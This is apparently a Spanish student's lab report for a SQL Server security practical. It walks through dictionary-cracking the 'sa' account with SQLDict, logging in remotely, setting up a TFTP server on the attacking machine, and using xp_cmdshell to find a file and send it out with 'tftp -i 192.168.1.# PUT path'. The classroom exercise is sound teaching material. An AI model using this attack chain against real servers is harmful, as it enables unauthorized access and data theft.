Práctica 1 - SQL Server

PRÁCTICA 1 - SQL SERVER

  • SQL Server (Valor 10 puntos TRABAJO ENTREGABLE)

Fecha de realización: 4 de noviembre del 2014

Reflexión: Los diseños de la base de datos sera cuidando ciertas especificaciones y caracteristicas para que en un futuro no nos tengamos que preocupar por la seguridad ya que existintes diversas maneras de poder corrumpir los datos en una base de datos que este con vulnerabilidades para esto debemos estudiar a fondo y realizar un ánalisis por donde nos pueden atacar y asi proteger esos lados que son más propensos a sufrir un ataque.           


*INSTALACIÓN DE SUPERSCAN

 *EJECUTAMOS LA HERRAMIENTA SQLPING:

*EJECUTAMOS LA HERRAMIENTA DE LA BASE DE DATOS, AQUÍ QUEDA YA CONFIGURADA EL PUERTO 1433


Fase 2.
En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para encontrar la contraseña de acceso de la cuenta administrativa “sa”.

Tarea
Pasos Detallados
1.      Ejecutar SQLDict.
a.      Ejecute el programa sqldict.exe desde el USB

b.      En el campo Target server IP, introduzca 192.168.1.100

c.       En el campo Target Account, asegúrese que se encuentra sa por default.

d.      Seleccione Load Password File

e.      Navegue a su USB, localice y seleccione el archivo passwords.txt.

Nota: el archivo Passwords.txt  contiene una selección de las palabras más frecuentes que son utilizadas como contraseñas de acceso para diversos servicios. Este archivo pertenece al CD “Openwall Wordlist Collection”, disponible en http://openwall.net

f.        Seleccione Start. Después de algunos minutos, deberá aparecer la contraseña.
EJECUTAMOS LA HERRAMIENTA SQLDICT, EN TARGET SERVER IP PONEMOS LA IP DE NUESTRA COMPUTADORA, EN TARGET ACCOUNT PONEMOS EL USUARIO EN LOAD PASSORD CARGAMOS EL ARCHIVO .TXT Y LE DAMOS START:
Fase 3.
En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener el control total del servidor de bases de datos, en forma remota y con privilegios administrativos.

Tarea
Pasos Detallados
1.      Configurar la herramienta Enterprise Manager, conectarse al servidor y controlarlo en forma remota.
a.      Ejecute la herramienta administrativa Management Studio en el menú Start | Programs | Microsoft SQL Server 2005 | SQL Server Management Studio Express

b.      En Nombre de servidor, introduzca 192.168.1.100

c.       En Autenticación, seleccione Autenticación de SQL Server. Introduzca la cuenta sa, con la contraseña que crackeo en el ejercicio anterior. Haga click en Conectar.
INSTALACIÓN DE MYSQL SERVER MANAGEMENT STUDIO EXPRESS
EJECUTE LA HERRAMIENTA ADMINISTRATIVA MANAGEMENT STUDIO EN EL MENÚ START | PROGRAMS | MICROSOFT SQL SERVER 2005 | SQL SERVER MANAGEMENT STUDIO EXPRESS

EN NOMBRE DE SERVIDOR, INTRODUZCA 192.168.5.41

EN AUTENTICACIÓN, SELECCIONE AUTENTICACIÓN DE SQL SERVER. INTRODUZCA LA CUENTA SA, CON LA CONTRASEÑA QUE CRACKEO EN EL EJERCICIO ANTERIOR. HAGA CLICK EN CONECTAR
Fase 4.
En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema operativo Windows contiene un cliente TFTP, pero no el componente servidor.

Tarea
Pasos Detallados
1.      Instalar un servidor TFTP
a.      Inserte la memoria USB.

b.      Abra el explorador de Windows, y navegue a la ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL

c.       Ejecute el software instalador de TFTP Server, SolarWinds-TFTP-Server.exe, aceptando las opciones por default que presenta el asistente. Si le solicita el CD de instalación de Microsoft Office, presione Cancelar.

d.      En la opción File – Configure, seleccione la pestaña  Security, activando la opción “Transmit and Receive files”. Presione “OK”.

EJECUCION DEL INSTALADOR TFTP SERVER SOLAR:
ACEPTAMOS LAS OPCIONES POR DEFAULT SERVER SOLAR:

INTERFAZ DEL PROGRAMA SERVER SOLAR:







OPCION FILE-CONFIGURE, SELECCIONAMOS LA PESTAÑA SECURITY Y ACTIVAMOS LA OPCIÓN TRANSMIT AND RECEIVE FILES SERVER SOLAR:

Fase 5.
En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir hacia la computadora atacante.


Tarea
Pasos Detallados
1.      Conectarse al servidor remoto
a.      En SQL Server Management Studio, selecciona Nueva consulta.
2.      Ejecutar el extended stored procedure xp_cmdshell para buscar y transferir un archivo hacia el hacker
a.      En la ventana de consultas, introduzca y ejecute el siguiente comando para localizar cualquier archivo de texto que usaremos como ejemplo.

xp_cmdshell ‘dir c:\*.txt /s’

b.      Active el servidor TFTP en la computadora atacante: menú Start | Programs | SolarWinds 2001 Standard Edition | File Transfer | TFTP Server.

c.       Transfiera el archivo encontrado hacia el equipo cliente, ejecutando el siguiente stored procedure:

xp_cmdshell ‘tftp –i 192.168.1.# PUT path’

Sustituya # por el número de estudiante que usted tiene asignado. Sustituya la palabra path por la ruta completa del archivo encontrado en el punto “a”. Si la ruta contiene espacios en blanco, necesita incluirla entre comillas “ ”.

Por ejemplo, si el archivo que desea transferir es c:\program files\test.txt, ejecute:

xp_cmdshell ‘tftp -i  192.168.1.# PUT “c:\program files\test.txt”’

d.      Verifique que el archive se transfirió hacia la computadora atacante, revisando el contenido del directorio c:\TFTP-root (el directorio que se configure por default para enviar y recibir archives por TFTP).

Publicado por